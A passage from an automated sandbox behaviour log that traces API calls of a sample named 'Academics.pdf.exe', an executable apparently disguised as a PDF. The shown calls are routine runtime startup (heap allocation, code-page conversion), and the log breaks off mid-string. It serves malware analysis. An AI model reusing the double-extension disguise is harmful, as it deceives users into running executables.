# Flog Txt Version 1 # Analyzer Version: 3.0.2 # Analyzer Build Date: May 3 2019 14:51:36 # Log Creation Date: 13.05.2019 21:56:31.395 Process: id = "1" image_name = "academics.pdf.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\academics.pdf.exe" page_root = "0x30dd4000" os_pid = "0xb0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xb10 [0132.217] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bff7c | out: lpSystemTimeAsFileTime=0x8bff7c*(dwLowDateTime=0x53a5810, dwHighDateTime=0x1d509d7)) [0132.217] GetCurrentProcessId () returned 0xb0c [0132.217] GetCurrentThreadId () returned 0xb10 [0132.217] GetTickCount () returned 0x2d892 [0132.217] QueryPerformanceCounter (in: lpPerformanceCount=0x8bff74 | out: lpPerformanceCount=0x8bff74*=23347657579) returned 1 [0132.256] GetStartupInfoW (in: lpStartupInfo=0x8bff20 | out: lpStartupInfo=0x8bff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x8bff84, hStdError=0x41f641)) [0132.256] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x25c0000 [0132.258] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0132.258] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0132.258] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0132.258] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0132.258] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f [0132.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x214) returned 0x25c07d0 [0132.259] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0132.259] GetCurrentThreadId () returned 0xb10 [0132.259] GetStartupInfoW (in: lpStartupInfo=0x8bfebc | out: lpStartupInfo=0x8bfebc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4179d7, hStdOutput=0x417d7e, hStdError=0x25c07d0)) [0132.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x800) returned 0x25c09f0 [0132.259] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0132.259] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0132.260] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0132.260] SetHandleCount (uNumber=0x20) returned 0x20 [0132.260] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe\" " [0132.260] GetEnvironmentStringsW () returned 0xa91ee8* [0132.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xaca) returned 0x25c11f8 [0132.260] FreeEnvironmentStringsW (penv=0xa91ee8) returned 1 [0132.260] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x496f38, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\academics.pdf.exe")) returned 0x37 [0132.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x78) returned 0x25c1cd0 [0132.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x98) returned 0x25c1d50 [0132.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x3e) returned 0x25c1df0 [0132.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x6c) returned 0x25c1e38 [0132.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x6e) returned 0x25c1eb0 [0132.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x78) returned 0x25c1f28 [0132.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x62) returned 0x25c1fa8 [0132.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x2e) returned 0x25c2018 [0132.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x48) returned 0x25c2050 [0132.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x28) returned 0x25c20a0 [0132.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x1a) returned 0x25c20d0 [0132.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x4a) returned 0x25c20f8 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x72) returned 0x25c2150 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x30) returned 0x25c21d0 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x2e) returned 0x25c2208 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x1c) returned 0x25c2240 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0xd2) returned 0x25c2268 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x7c) returned 0x25c2348 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x36) returned 0x25c23d0 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x3a) returned 0x25c2410 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x90) returned 0x25c2458 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x24) returned 0x25c24f0 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x30) returned 0x25c2520 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x36) returned 0x25c2558 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x48) returned 0x25c2598 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x52) returned 0x25c25e8 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x3c) returned 0x25c2648 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x82) returned 0x25c2690 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x2e) returned 0x25c2720 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x1e) returned 0x25c2758 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x2c) returned 0x25c2780 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x54) returned 0x25c27b8 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x52) returned 0x25c2818 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x2a) returned 0x25c2878 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x3c) returned 0x25c28b0 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x54) returned 0x25c28f8 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x24) returned 0x25c2958 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x30) returned 0x25c2988 [0132.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x8c) returned 0x25c29c0 [0132.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25c11f8 | out: hHeap=0x25c0000) returned 1 [0132.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x80) returned 0x25c2a58 [0132.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x8, Size=0x800) returned 0x25c11f8 [0132.262] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0132.262] GetLastError () returned 0x0 [0132.262] SetLastError (dwErrCode=0x0) [0132.262] GetLastError () returned 0x0 [0132.262] SetLastError (dwErrCode=0x0) [0132.262] GetLastError () returned 0x0 [0132.262] SetLastError (dwErrCode=0x0) [0132.262] GetACP () returned 0x4e4 [0132.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x220) returned 0x25c1a00 [0132.262] GetLastError () returned 0x0 [0132.262] SetLastError (dwErrCode=0x0) [0132.262] IsValidCodePage (CodePage=0x4e4) returned 1 [0132.262] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x8bfe84 | out: lpCPInfo=0x8bfe84) returned 1 [0132.262] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x8bf950 | out: lpCPInfo=0x8bf950) returned 1 [0132.262] GetLastError () returned 0x0 [0132.262] SetLastError (dwErrCode=0x0) [0132.262] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8bfd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0132.262] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8bfd64, cbMultiByte=256, lpWideCharStr=0x8bf6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0132.262] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x8bf964 | out: lpCharType=0x8bf964) returned 1 [0132.262] GetLastError () returned 0x0 [0132.262] SetLastError (dwErrCode=0x0) [0132.262] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8bfd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0132.263] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8bfd64, cbMultiByte=256, lpWideCharStr=0x8bf698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ탽妄워AĀ") returned 256 [0132.263] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ탽妄워AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0132.263] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ탽妄워AĀ", cchSrc=256, lpDestStr=0x8bf488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0132.263] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x8bfc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xcf\xd5\xd1\x6a\x9c\xfe\x8b", lpUsedDefaultChar=0x0) returned 256 [0132.263] GetLastError () returned 0x0 [0132.263] SetLastError (dwErrCode=0x0) [0132.263] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8bfd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0132.263] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8bfd64, cbMultiByte=256, lpWideCharStr=0x8bf6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ탽妄워AĀ") returned 256 [0132.263] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ탽妄워AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0132.263] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ탽妄워AĀ", cchSrc=256, lpDestStr=0x8bf4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0132.263] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x8bfb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\x